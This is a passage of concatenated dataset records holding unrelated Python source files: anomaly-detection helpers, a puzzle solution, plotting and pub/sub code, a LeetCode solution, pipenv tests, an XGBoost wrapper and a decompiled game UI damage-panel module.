bisect_right(facts['factbegindatetime'], slot_begintime)\n    if position == 0:\n        return []\n    if position == len(facts):\n        return value_list\n    factendtime = facts.loc[position - 1]['factenddatetime']\n    if factendtime > slot_begintime:\n        if slot_endtime < factendtime:\n            time = (slot_endtime - slot_begintime) / np.timedelta64(1, 's')\n        else:\n            time = (factendtime - slot_begintime) / np.timedelta64(1, 's')\n        value_list.append([facts.loc[position - 1]['machinemodeid'], time])\n    while slot_endtime > facts.loc[position]['factbegindatetime']:\n        factbegintime = facts.loc[position]['factbegindatetime']\n        factendtime = facts.loc[position]['factenddatetime']\n        if slot_endtime < factendtime:\n            time = (slot_endtime - 
factbegintime) / np.timedelta64(1, 's')\n        else:\n            time = (factendtime - factbegintime) / np.timedelta64(1, 's')\n        value_list.append([facts.loc[position]['machinemodeid'], time])\n        position += 1\n        if position > len(facts) - 1:\n            break\n    return value_list\n\n\ndef analyse_all_abnormal_sequences_ocsvm(company, machinemoduleid):\n    sequenceslots = read_sequenceslot(company)\n    pattern = re.compile(r'matrix(\\d+)machinemodule(\\d+).mat')\n    sequences = []\n    for root, dire, files in os.walk(company + '/matrices/machinemodule' + str(machinemoduleid)):\n        if len(files) >= 1:\n            for file in files:\n                if file.endswith('.mat'):\n                    search = pattern.search(file)\n                    if search:\n                        sequences.append([int(search.group(1)), int(search.group(2))])\n    print(sequences)\n    # random.shuffle(sequences)\n    errorlist = []\n    for item in sequences:\n        error = analyse_specifique_sequence_ocsvm(sequenceslots, item[0], item[1], company)\n        if error == 0:\n            errorlist.append([item[0], item[1]])\n    print('These are the misclassified sequences: ')\n    print(errorlist)\n    print(len(errorlist))\n\n\ndef find_standard_duration(distribution):\n    def calculate_proportion(series, interval):\n        count = 0\n        for value in series.index:\n            if interval[0] <= value <= interval[1]:\n                count += series.loc[value]\n        return count / sum(series) * 100\n    counts = distribution.value_counts()\n    candidate = counts.index[0]\n    prop = calculate_proportion(counts, (candidate - 2, candidate + 2))\n    print(prop)\n    if prop > 90:\n        return candidate, prop\n    return candidate, -1\n\n\ndef find_confidence_interval(duration_column):\n    if len(duration_column) == 0:\n        return [[0, 0]]\n\n    def merge_interval(interval_list):\n        interval_list.sort(key=lambda x: x[0])\n        prev = None\n        result = []\n        for inter in interval_list:\n            if prev is None or prev[1] < inter[0]:\n                result.append(inter)\n                prev = inter\n            if prev[1] < inter[1]:\n                prev[1] = inter[1]\n        return result\n\n    def calculate_proportion(series, interval):\n        count = 0\n        for value in series.index:\n            if interval[0] < value <= interval[1]:\n                count += series.loc[value]\n        return count / sum(series) * 100\n\n    def calculate_proportion_fromlist(series, interval_list):\n        accu = 0\n        for inter in interval_list:\n            accu += calculate_proportion(series, inter)\n        return accu\n\n    def fusion_interval(intervals):\n        # NOTE: new_interval_list is built but never returned; as written, the\n        # function returns the (sorted) input list\n        intervals.sort(key=lambda x: x[0])\n        new_interval_list = []\n        prev = None\n        for interval in intervals:\n            # initiation\n            if prev is None:\n                prev = interval\n                continue\n            if interval[0] <= prev[1] + 4:\n                new_interval_list.append([prev[0], interval[1]])\n                prev[1] = interval[0]\n            else:\n                prev = interval\n        return intervals\n\n    def delete_single_interval(interval_list, series):\n        result = []\n        for interval in interval_list:\n            if interval[1] - interval[0] <= 4:\n                if calculate_proportion(series, interval) > 5:\n                    result.append(interval)\n                else:\n                    continue\n            else:\n                result.append(interval)\n        return result\n\n    interval_list_r = []\n    counts = duration_column.value_counts()\n\n    i = 0\n    while True:\n        candidate = counts.index[i]\n        minimum = candidate - 2\n        maximum = candidate + 2\n        interval_list_r.append([minimum, maximum])\n        interval_list_r = merge_interval(interval_list_r)\n        proportion = calculate_proportion_fromlist(counts, interval_list_r)\n        if proportion > 99:\n            break\n        i += 1\n\n    interval_list_r[0][0] = 0\n    interval_list_r[-1][1] -= 0\n\n    interval_list_r = delete_single_interval(interval_list_r, counts)\n    interval_list_r = fusion_interval(interval_list_r)\n\n    final_result = []\n    for item in interval_list_r:\n        final_result.append([item, 
calculate_proportion(counts, item)])\n    final_result.sort(key=lambda x: x[1], reverse=True)\n    print(final_result)\n\n    finalfinal = []\n    for item in final_result:\n        if item[1] > 5:\n            finalfinal.append(item[0])\n    print(finalfinal)\n    return finalfinal\n\n\n# noinspection PyUnresolvedReferences\ndef validate_model(company):\n    pattern = re.compile(r'matrix(\\d+)machinemodule(\\d+).mat')\n    sequences = []\n    for root, dire, files in os.walk(company + '/matrices'):\n        if len(files) >= 1:\n            for file in files:\n                if file.endswith('.mat'):\n                    search = pattern.search(file)\n                    if search:\n                        sequences.append([int(search.group(1)), int(search.group(2))])\n    print(sequences)\n\n    higher = preprocessing.PolynomialFeatures(degree=2)\n    for sequence in sequences:\n        model_name = company + '/models/model' + str(sequence[0]) + 'machinemodule' + str(sequence[1]) + '.pkl'\n        try:\n            model = joblib.load(model_name)\n        except FileNotFoundError:\n            print('file not found ' + model_name)\n            continue\n        filename = company + '/matrices/matrix' + str(sequence[0]) + 'machinemodule' + str(sequence[1]) + '.mat'\n        with open(filename, 'rb') as data:\n            feature_matrix = pickle.load(data)\n        learning_matrix = clean_featurematrix(feature_matrix, company)\n        print(learning_matrix)\n        del learning_matrix['sequenceduration']\n        del learning_matrix['normal']\n        learning_matrix = higher.fit_transform(model.scaler.transform(learning_matrix))\n        learning_matrix = model.pca.transform(learning_matrix)\n        result = model.svm.predict(learning_matrix)\n        print(result)\n\n\nif __name__ == '__main__':\n    #sequenceslotss = read_sequenceslot('Bucher')\n    #analyse_specifique_sequence_ocsvm(sequenceslotss, 14723, 4, 'Bucher')\n    #analyse_specifique_sequence_ocsvm(sequenceslotss, 14731, 4, 'Bucher')\n    #analyse_specifique_sequence_ocsvm(sequenceslotss, 14732, 4, 'Bucher')\n\n    #analyse_specifique_sequence_ocsvm(sequenceslotss, 14735, 4, 'Bucher')\n\n\n    #analyse_all_abnormal_sequences_ocsvm('Bucher', 4)\n    get_matrix_for_machinemodule('Blackmer', 4)\n\n","sub_path":"fonctions.py","file_name":"fonctions.py","file_ext":"py","file_size_in_byte":37953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"92143177","text":"# -*- coding: utf-8 -*-\n\n# image practice\n# http://www.pythonchallenge.com/pc/def/oxygen.html\n\n# PIL = Python Image Library\nfrom PIL import Image\n\n\nimgOxygen = Image.open('oxygen.png')\nimgWidth, imgHeight = imgOxygen.size\n\n\n# find the height (y) at which the pixels turn gray-scale\ny = 0\nwhile True:\n\tcol = imgOxygen.getpixel((0, y))\n\tif( col[0] == col[1] == col[2] ):\n\t\tbreak;\n\ty += 1\n\nprint('gray-scale pos(y):' + str(y))\n\n\n# scan the gray-scale squares horizontally; when the color changes, convert it to a character\nretChars = []\nx = 0\ncolOld = -1\nwhile x < imgWidth:\n\tcol = imgOxygen.getpixel((x, y))\n\tif( col[0] == col[1] == col[2] ):\n\t\t# if the pixel is gray, convert its color value with chr\n\t\tretChars.append(col[0])\n\t\n\tcolOld = col[0]\n\t\n\t# the same color can repeat, so step sideways by the square width\n\tx += 7\n\n# output the string\nretStr = ''\nfor c in retChars:\n\t# print(chr(c))\n\tretStr += chr(c)\n\nprint(retStr)\n#smart guy, you made it. 
the next level is [105, 110, 116, 101, 103, 114, 105, 116, 121]\n\n\n# encode these once more...\nchars2 = [105, 110, 116, 101, 103, 114, 105, 116, 121]\nretStr = ''\nfor c in chars2:\n\tretStr += chr(c)\n\nprint(retStr)\n#integrity","sub_path":"7/img_prac.py","file_name":"img_prac.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"447872086","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n# Author = \"Hui_Yao\"\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import font_manager\n\nmy_font = font_manager.FontProperties(fname = '/usr/share/fonts/YaheiConsolas/YaHeiConsolas.ttf')\n\ny_3 = [11,17,16,11,12,11,12,6,6,7,8,9,12,15,14,17,18,21,16,17,20,14,15,15,15,19,21,22,22,22,23]\ny_10 = [26,26,28,19,21,17,16,19,18,20,20,19,22,23,17,20,21,20,22,15,11,15,5,13,17,10,11,13,12,13,6]\n\nx_3 = range(1,32)\nx_10 = range(51,82)\nx_ = list(x_3) + list(x_10) # there can only be one x-axis data sequence\n\nx_labels = ['3月{}号'.format(i) for i in x_3]\nx_labels += ['10月{}号'.format(i-52) for i in x_10] # likewise there can only be one set of x-axis labels\n\nplt.figure(figsize=(20,8),dpi = 100)\n\nplt.xticks(x_[::3],x_labels[::3],fontproperties = my_font,rotation = 45)\n\nplt.xlabel('时间',fontproperties = my_font)\nplt.ylabel('温度',fontproperties = my_font)\nplt.title('时间与温度的关系',fontproperties = my_font)\n\nplt.scatter(x_3,y_3,label = '3月份')\nplt.scatter(x_10,y_10,label = '10月份')\n\nplt.legend(loc = 'upper left' , prop = my_font)\n\nplt.show()\n\n\n\n\n\n\n","sub_path":"python_note/03_matplotlib/01_matplotlib/02_绘制散点图.py","file_name":"02_绘制散点图.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"503358879","text":"\"\"\"Async pubsub implementation.\"\"\"\n\nimport asyncio\nimport logging\nimport random\nfrom asyncio import CancelledError\nfrom typing import Any, Optional\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Channel:\n    \"\"\"A channel to which you can subscribe.\"\"\"\n\n    def __init__(self, name: str = \"a channel\"):\n        self.subscriptions: set = set()\n        self.name = name\n        self._last = None\n\n    def publish(self, message: Any):\n        \"\"\"Publish a message on this channel.\"\"\"\n        self._last = message\n        for queue in self.subscriptions:\n            queue.put_nowait(message)\n\n    def get_latest(self):\n        \"\"\"Return the last message that was put in the queue.\"\"\"\n        return self._last\n\n    def get_subscription(self) -> \"Subscription\":\n        \"\"\"Return a subscription object.\n\n        Used internally but also useful to create custom subscriber methods.\n        \"\"\"\n        subscription = Subscription(self)\n        self.subscriptions.add(subscription.queue)\n        LOGGER.debug(\n            \"Subscribing to %s. 
Total subscribers: %s\",\n self.name,\n len(self.subscriptions),\n )\n return subscription\n\n def subscribe(self, callback) -> \"Subscription\":\n \"\"\"Subscribe to this channel\"\"\"\n _loop = asyncio.get_running_loop()\n subscription = self.get_subscription()\n subscription.task = _loop.create_task(self._subscribe(subscription, callback))\n return subscription\n\n async def _subscribe(self, subscription: \"Subscription\", callback):\n try:\n with subscription as queue:\n while True:\n msg = await queue.get()\n callback(msg)\n queue.task_done()\n except CancelledError:\n LOGGER.debug(\"Shutting down subscriber\")\n\n\nclass Subscription:\n \"\"\"Subscription class.\n Used to subscribe to a Channel.\"\"\"\n\n def __init__(self, hub: \"Channel\"):\n self.hub = hub\n self.queue = asyncio.Queue()\n self.task: Optional[asyncio.Task] = None\n\n def cancel(self):\n \"\"\"Cancel the subscription. The same as unsubscribe\"\"\"\n self.unsubscribe()\n\n def unsubscribe(self):\n \"\"\"Unsubscribe the subscription.\"\"\"\n if self.task is not None:\n self.task.cancel()\n self._remove_subscription()\n\n def _remove_subscription(self):\n if self.queue in self.hub.subscriptions:\n self.hub.subscriptions.remove(self.queue)\n LOGGER.debug(\n \"Un-subscribing from channel: %s, subscriber count: %s\",\n self.hub.name,\n len(self.hub.subscriptions),\n )\n\n def __enter__(self):\n self.hub.subscriptions.add(self.queue)\n LOGGER.debug(\n \"Subscription: %s, total subscriptions %i\",\n self.hub.name,\n len(self.hub.subscriptions),\n )\n return self.queue\n\n def __exit__(self, _type, value, traceback):\n self._remove_subscription()\n\n\nasync def reader(name, hub):\n \"\"\"An example reader\"\"\"\n msg = \"\"\n with Subscription(hub) as queue:\n while msg != \"SHUTDOWN\":\n msg = await queue.get()\n print(f\"Reader {name} got message: {msg}\")\n\n if random.random() < 0.1:\n print(f\"Reader {name} has read enough\")\n break\n\n print(f\"Reader {name} is shutting down\")\n","sub_path":"aiosubpub/aiosubpub.py","file_name":"aiosubpub.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"425992065","text":"\"\"\"\n// Time Complexity : O(n)\n// Space Complexity : O(1)\n// Did this code successfully run on Leetcode : Yes\n// Any problem you faced while coding this : Trying to come with intuitve soln of\nnegative indexing\n\n// Your code here along with comments explaining your approach\nAlgorithm Explanation\nIterate till i < nums1 length and j < nums2 length\nBF:\nif nums2 ele is greater than num1 ele, then move nums1 pointer\nelse:\n shift the elements in nums1 by 1 from m-1th position\n increment m by 1\n replace nums1 ele with nums2 ele\n iterate nums2 pointer\nIf there are elements in nums2, place them beginning 0 in nums1\nOptimal - eliminating the shifting part, using the merge sort logic\nConfiguration - i = m -1, j = n-1, target = m + n - 1\n1. Use a target pointer to update the nums1 from num1 array and nums2 array\nbased on the greater element, since we are trying to place elements in order\n2. 
If there are elements in nums2, place them from target position till all \nthe elements in nums2 are placed in nums1\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n    def merge_bruteforce(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n        \"\"\"\n        Brute-force variant (insert-and-shift). Kept as a separate method because\n        running it before the optimal pass would mutate nums1 and m and corrupt\n        the result (the original ran both passes back to back).\n        \"\"\"\n        i,j = 0,0\n        # print(nums1, nums2)\n        if nums2: #if nums2 is empty we don't do anything\n            while i < m and j < n:\n                if nums2[j] > nums1[i]:\n                    i+=1\n                else:\n                    #shift the elements in nums1 by one till the end of the array\n                    k = m - 1\n                    m+=1 #incrementing m since we are updating the list by one element from nums2\n                    #Shifting the elements in nums1 starting from the current m-1 index\n                    while k >=i:\n                        nums1[k+1] = nums1[k]\n                        k-=1\n                    #At this moment we just replace nums1[i] by nums2[j]\n                    nums1[i] = nums2[j]\n                    j+=1\n            #place the remaining elements of nums2 after the merged prefix\n            while j < n:\n                nums1[i] = nums2[j]\n                i+=1\n                j+=1\n\n    def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n        \"\"\"\n        Do not return anything, modify nums1 in-place instead.\n        \"\"\"\n        i,j,target = m-1,n-1,m+n-1\n        #Placing the elements in order using the target pointer (similar to merge sort, just here we go from behind)\n        if nums2:\n            while i >=0 and j >=0:\n                if nums1[i] > nums2[j]:\n                    nums1[target] = nums1[i]\n                    i-=1\n                else:\n                    nums1[target] = nums2[j]\n                    j-=1\n                target-=1\n\n            #checking the remaining elements of nums2, need to move these elements into nums1 from the target pointer down to index 0\n            while j >=0:\n                nums1[target] = nums2[j]\n                j-=1\n                target-=1\n","sub_path":"merge_sorted_array.py","file_name":"merge_sorted_array.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"336246944","text":"import os\nimport subprocess\nimport sys\n\nimport pytest\n\n\n@pytest.mark.cli\n@pytest.mark.help\ndef test_help():\n    output = subprocess.check_output(\n        [sys.executable, '-m', 'pipenv.help'],\n        stderr=subprocess.STDOUT, env=os.environ.copy(),\n    )\n    assert output\n\n\n@pytest.mark.cli\n@pytest.mark.help\ndef test_count_of_description_pre_option():\n    test_command = 'pipenv install --help'\n    test_line = '--pre Allow pre-releases.'\n    out = subprocess.Popen(test_command.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n    stdout, _ = out.communicate()\n    lines = stdout.decode().split('\\n')\n    count = 0\n    for line in lines:\n        if line.strip().split() == test_line.split():\n            count += 1\n    assert count == 1\n","sub_path":"tests/unit/test_help.py","file_name":"test_help.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"503347239","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 7 20:33:27 2017\n\n@author: ksripinyo\n\"\"\"\n\n\n# User inputted variables here\nannual_salary = float(input('What is your starting annual salary? '))\nsemi_annual_raise = float(input('What % is your semi-annual raise? '))\nportion_saved = float(input('What portion of your salary will you save each month (decimal form)? '))\ntotal_cost = float(input('What is the total cost of your dream home? 
'))\n\n#fixed variables here\nportion_down_payment = float(0.25) #defined by professor\ndown_payment = float(total_cost*portion_down_payment) #savings target for the down payment\ncurrent_savings = float(0) #start with no savings\nr = float(0.04) #The annual return rate on savings.\nmonths = int(0) #set a variable for number of months\nsemi_annual_raise=semi_annual_raise/100\n\nwhile months < 37:\n    current_savings = round(current_savings + current_savings*(r/12) + (annual_salary/12)*portion_saved,2)\n    print ('Savings at month',months,'=',current_savings)\n    months = months +1\n    if (months/6.).is_integer():\n        annual_salary=round(annual_salary*(1+semi_annual_raise),2)\n        print ('\\nNew salary after raise=',annual_salary)\n    \nprint ('Total savings at',months,'months is',current_savings,'.')\n    ","sub_path":"Problem Sets/ps1/ps1b2.py","file_name":"ps1b2.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"455563897","text":"# coding=utf-8\n\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\n\n\nclass MyXgbClassifier:\n    def __init__(self, params,\n                 num_boost_round=2000,\n                 early_stopping_rounds=25,\n                 verbose_eval=25,\n                 test_size=.2,\n                 random_state=2017):\n        self.params = params\n        self.model = None\n        self.num_boost_round = num_boost_round\n        self.esr = early_stopping_rounds\n        self.verbose_eval = verbose_eval\n        self.test_size = test_size\n        self.random_state = random_state\n\n    def fit(self, X_train, y_train, X_val=None, y_val=None):\n\n        if X_val is None or y_val is None:\n            # no validation set supplied: split one off the training data\n            X_train, X_val, y_train, y_val = train_test_split(\n                X_train, y_train, test_size=self.test_size,\n                random_state=self.random_state\n            )\n        dtrain = xgb.DMatrix(X_train, y_train)\n        dval = xgb.DMatrix(X_val, y_val)\n\n        partial_model = xgb.train(self.params, dtrain, evals=[(dval, 'val')],\n                                  num_boost_round=self.num_boost_round,\n                                  early_stopping_rounds=self.esr,\n                                  verbose_eval=self.verbose_eval)\n        num_boost_round = partial_model.best_iteration\n\n        self.model = xgb.train(self.params, dtrain,\n                               num_boost_round=num_boost_round)\n\n    def predict(self, X_test):\n        if self.model is None:\n            return None\n        dtest = xgb.DMatrix(X_test)\n        return self.model.predict(dtest)\n","sub_path":"my_py_models/my_xgb_classifier.py","file_name":"my_xgb_classifier.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"606513558","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\r\n# Embedded file name: scripts/client/gui/Scaleform/daapi/view/battle/legacy/damage_panel.py\r\nimport math\r\nimport BigWorld\r\nimport GUI\r\nimport Math\r\nfrom constants import ATTACK_REASON_INDICES\r\nfrom debug_utils import LOG_DEBUG\r\nfrom gui.Scaleform.daapi.view.battle.legacy import DAMAGE_PANEL_PATH, TANK_INDICATOR_PANEL_PATH\r\nfrom gui.Scaleform.daapi.view.battle.legacy.meta.DamagePanelMeta import DamagePanelMeta\r\nfrom gui.Scaleform.locale.FALLOUT import FALLOUT\r\nfrom gui.Scaleform.locale.RES_ICONS import RES_ICONS\r\nfrom gui.battle_control import g_sessionProvider, vehicle_getter\r\nfrom gui.battle_control.arena_info.interfaces import IArenaVehiclesController\r\nfrom gui.battle_control.battle_constants import VEHICLE_VIEW_STATE\r\n_STATE_HANDLERS = {VEHICLE_VIEW_STATE.HEALTH: 'as_updateHealthS',\r\n VEHICLE_VIEW_STATE.SPEED: 'as_updateSpeedS',\r\n VEHICLE_VIEW_STATE.CRUISE_MODE: 'as_setCruiseModeS',\r\n VEHICLE_VIEW_STATE.FIRE: 'as_setFireInVehicleS',\r\n VEHICLE_VIEW_STATE.AUTO_ROTATION: 'as_setAutoRotationS',\r\n VEHICLE_VIEW_STATE.DESTROYED: '_updateDestroyed',\r\n 
VEHICLE_VIEW_STATE.CREW_DEACTIVATED: '_updateCrewDeactivated',\r\n VEHICLE_VIEW_STATE.PLAYER_INFO: '_updatePlayerInfo',\r\n VEHICLE_VIEW_STATE.DEVICES: '_updateDeviceState',\r\n VEHICLE_VIEW_STATE.REPAIRING: '_updateRepairingDevice',\r\n VEHICLE_VIEW_STATE.SWITCHING: '_switching',\r\n VEHICLE_VIEW_STATE.RPM: 'as_setNormalizedEngineRpmS',\r\n VEHICLE_VIEW_STATE.MAX_SPEED: 'as_updateMaxSpeedS',\r\n VEHICLE_VIEW_STATE.VEHICLE_MOVEMENT_STATE: '_updateVehicleMovementState',\r\n VEHICLE_VIEW_STATE.VEHICLE_ENGINE_STATE: '_updateVehicleEngineState'}\r\n\r\nclass _TankIndicatorCtrl(object):\r\n    \"\"\"\r\n    Tank Indicator flash GUI component.\r\n    \"\"\"\r\n\r\n    def __init__(self, ui):\r\n        mc = GUI.WGTankIndicatorFlash(ui.movie, TANK_INDICATOR_PANEL_PATH)\r\n        mc.wg_inputKeyMode = 2\r\n        ui.component.addChild(mc, 'tankIndicator')\r\n\r\n    def __del__(self):\r\n        LOG_DEBUG('_TankIndicatorCtrl deleted')\r\n\r\n    def clear(self, ui):\r\n        setattr(ui.component, 'tankIndicator', None)\r\n        return\r\n\r\n    def setup(self, ui, vehicle, yawLimits):\r\n        \"\"\"\r\n        Sets up the current properties of the vehicle.\r\n        \r\n        :param ui: instance of parent UI.\r\n        :param vehicle: entity of vehicle.\r\n        :param yawLimits: tuple(left angle, right angle) containing yaw limit in degrees.\r\n        \"\"\"\r\n        if vehicle.isPlayerVehicle:\r\n            hullMat = BigWorld.player().getOwnVehicleMatrix()\r\n        else:\r\n            hullMat = vehicle.matrix\r\n        turretMat = vehicle.appearance.turretMatrix\r\n        tankIndicator = ui.component.tankIndicator\r\n        if yawLimits:\r\n            tankIndicator.wg_turretYawConstraints = yawLimits\r\n        else:\r\n            tankIndicator.wg_turretYawConstraints = Math.Vector2(0.0, 0.0)\r\n        tankIndicator.wg_hullMatProv = hullMat\r\n        tankIndicator.wg_turretMatProv = turretMat\r\n\r\n\r\nclass DamagePanel(DamagePanelMeta, IArenaVehiclesController):\r\n    \"\"\"\r\n    The panel that displays current properties of vehicle:\r\n    - name of player and type of tank;\r\n    - crew, devices;\r\n    - tank indicator by type: SPG, AT-SPG, Tank. For vehicles that have yaw limit (for SPG, AT-SPG)\r\n    - angle constraints for turret.\r\n    - speed of vehicle;\r\n    - tachometer;\r\n    - current and maximum health of vehicle;\r\n    - current mode for cruise control. Only for player's vehicle;\r\n    - indicators of damage to crew. Only for player's vehicle;\r\n    - indicators of damage to device. Only for player's vehicle;\r\n    - auto rotation. Only for player's vehicle;\r\n    - fire. 
Only for player's vehicle.\r\n    \"\"\"\r\n\r\n    def __init__(self, parentUI):\r\n        super(DamagePanel, self).__init__()\r\n        self.__ui = parentUI\r\n        self.__tankIndicator = None\r\n        self.__isShow = True\r\n        self.__isHasGasAttack = False\r\n        self.__vehicleID = None\r\n        return\r\n\r\n    def __del__(self):\r\n        LOG_DEBUG('DamagePanel deleted')\r\n\r\n    def start(self):\r\n        \"\"\"\r\n        Routine invoked when the battle interface is created (the player has joined the arena).\r\n        \"\"\"\r\n        self.__isHasGasAttack = g_sessionProvider.arenaVisitor.hasGasAttack()\r\n        if self._populate(self.__ui.getMember(DAMAGE_PANEL_PATH)):\r\n            self.__tankIndicator = _TankIndicatorCtrl(self.__ui)\r\n        ctrl = g_sessionProvider.shared.vehicleState\r\n        if ctrl is not None:\r\n            ctrl.onVehicleControlling += self.__onVehicleControlling\r\n            ctrl.onVehicleStateUpdated += self.__onVehicleStateUpdated\r\n        g_sessionProvider.addArenaCtrl(self)\r\n        vehicle = ctrl.getControllingVehicle()\r\n        if vehicle:\r\n            self.__vehicleID = vehicle.id\r\n            self._updatePlayerInfo(vehicle.id)\r\n            self.__onVehicleControlling(vehicle)\r\n        return\r\n\r\n    def destroy(self):\r\n        \"\"\"\r\n        Routine invoked when the player leaves the arena.\r\n        \"\"\"\r\n        ctrl = g_sessionProvider.shared.vehicleState\r\n        if ctrl is not None:\r\n            ctrl.onVehicleControlling -= self.__onVehicleControlling\r\n            ctrl.onVehicleStateUpdated -= self.__onVehicleStateUpdated\r\n        g_sessionProvider.removeArenaCtrl(self)\r\n        if self._flashObject:\r\n            self.as_destroyS()\r\n            self._dispose()\r\n        if self.__tankIndicator:\r\n            self.__tankIndicator.clear(self.__ui)\r\n            self.__tankIndicator = None\r\n        self.__ui = None\r\n        self.__isShow = False\r\n        self.__isHasGasAttack = False\r\n        return\r\n\r\n    def showAll(self, isShow):\r\n        \"\"\"\r\n        Hides damage panel component if camera mode equals video.\r\n        \r\n        :param isShow: True if damage panel component should be visible, otherwise false.\r\n        \"\"\"\r\n        if self.__isShow != isShow:\r\n            self.__isShow = isShow\r\n            self.as_showS(isShow)\r\n\r\n    def clickToTankmanIcon(self, entityName):\r\n        self.__changeVehicleSetting('medkit', entityName)\r\n\r\n    def clickToDeviceIcon(self, entityName):\r\n        self.__changeVehicleSetting('repairkit', entityName)\r\n\r\n    def clickToFireIcon(self):\r\n        self.__changeVehicleSetting('extinguisher', None)\r\n        return\r\n\r\n    def updateVehiclesInfo(self, updated, arenaDP):\r\n        for flags, vo in updated:\r\n            if vo.vehicleID == self.__vehicleID:\r\n                self._updatePlayerInfo(self.__vehicleID)\r\n                break\r\n\r\n    def _updatePlayerInfo(self, value):\r\n        \"\"\"\r\n        Updates player information on panel.\r\n        \r\n        :param value: ID of vehicle.\r\n        \"\"\"\r\n        result = g_sessionProvider.getCtx().getPlayerFullNameParts(vID=value, showVehShortName=False)\r\n        self.as_setPlayerInfoS(result.playerFullName, result.playerName, result.clanAbbrev, result.regionCode, result.vehicleName)\r\n\r\n    def _updateDeviceState(self, value):\r\n        \"\"\"\r\n        Updates indicators of damage to crew/devices.\r\n        \r\n        :param value: name of entity.\r\n        :return: (deviceName, deviceState, realState).\r\n        \"\"\"\r\n        LOG_DEBUG('updateDeviceState', value)\r\n        self.as_updateDeviceStateS(*value[:2])\r\n\r\n    def _updateRepairingDevice(self, value):\r\n        \"\"\"\r\n        Updates current module repair status bar. 
It's called from Avatar.updateVehicleMiscStatus.\r\n \r\n :param value: (deviceName, progress, seconds) where are\r\n - deviceName, string value of device name;\r\n - progress, integer containing current progress of repair (percent);\r\n - seconds, integer containing time left to repair module.\r\n \"\"\"\r\n self.as_updateRepairingDeviceS(*value)\r\n\r\n def _updateCrewDeactivated(self, deathReasonID):\r\n self.as_setCrewDeactivatedS()\r\n\r\n def _updateDestroyed(self, deathReasonID=None):\r\n if self.__isHasGasAttack and deathReasonID is not None:\r\n if deathReasonID == ATTACK_REASON_INDICES['gas_attack']:\r\n self.__ui.movie.falloutItems.as_setPostmortemGasAtackInfo({'imgPath': RES_ICONS.MAPS_ICONS_BATTLE_ICON_BATTLE_DEAD,\r\n 'infoStr': FALLOUT.GASATTACK_POSTMORTEM_VEHICLEDESTROYED,\r\n 'respawnInfo': FALLOUT.GASATTACK_POSTMORTEM_RESPAWNINFO})\r\n else:\r\n self.__ui.movie.falloutItems.as_setPostmortemGasAtackInfo({'infoStr': FALLOUT.GASATTACK_POSTMORTEM_VEHICLEDESTROYED,\r\n 'respawnInfo': FALLOUT.GASATTACK_POSTMORTEM_RESPAWNINFO})\r\n self.as_setVehicleDestroyedS()\r\n return\r\n\r\n def _updateVehicleMovementState(self, runAnimation):\r\n if runAnimation:\r\n self.as_startVehicleStartAnimS()\r\n else:\r\n self.as_finishVehicleStartAnimS()\r\n\r\n def _updateVehicleEngineState(self, runAnimation):\r\n if runAnimation:\r\n self.as_playEngineStartAnimS()\r\n else:\r\n self.as_finishVehicleStartAnimS()\r\n\r\n def _switching(self, _):\r\n self.as_resetS()\r\n if self.__isHasGasAttack:\r\n self.__ui.movie.falloutItems.as_hidePostmortemGasAtackInfo()\r\n\r\n def __changeVehicleSetting(self, tag, entityName):\r\n ctrl = g_sessionProvider.shared.equipments\r\n if ctrl is None:\r\n return\r\n else:\r\n result, error = ctrl.changeSettingByTag(tag, entityName=entityName, avatar=BigWorld.player())\r\n if not result and error:\r\n ctrl = g_sessionProvider.shared.messages\r\n if ctrl is not None:\r\n ctrl.onShowVehicleErrorByKey(error.key, error.ctx)\r\n return\r\n\r\n def __onVehicleControlling(self, vehicle):\r\n self.__vehicleID = vehicle.id\r\n vTypeDesc = vehicle.typeDescriptor\r\n vType = vTypeDesc.type\r\n yawLimits = vehicle_getter.getYawLimits(vTypeDesc)\r\n if yawLimits:\r\n inDegrees = (math.degrees(-yawLimits[0]), math.degrees(yawLimits[1]))\r\n else:\r\n inDegrees = None\r\n if vehicle.isPlayerVehicle:\r\n isAutoRotationOn = vehicle_getter.isAutoRotationOn(vTypeDesc)\r\n else:\r\n isAutoRotationOn = None\r\n self.as_setupS((vTypeDesc.maxHealth, vehicle.health), vehicle_getter.getVehicleIndicatorType(vTypeDesc), vehicle_getter.getCrewMainRolesWoIndexes(vType.crewRoles), inDegrees, vehicle_getter.hasTurretRotator(vTypeDesc), isAutoRotationOn)\r\n if self.__tankIndicator:\r\n self.__tankIndicator.setup(self.__ui, vehicle, yawLimits)\r\n return\r\n\r\n def __onVehicleStateUpdated(self, state, value):\r\n if state not in _STATE_HANDLERS:\r\n return\r\n else:\r\n handler = getattr(self, _STATE_HANDLERS[state], None)\r\n if handler and callable(handler):\r\n if value is not None:\r\n handler(value)\r\n else:\r\n handler()\r\n 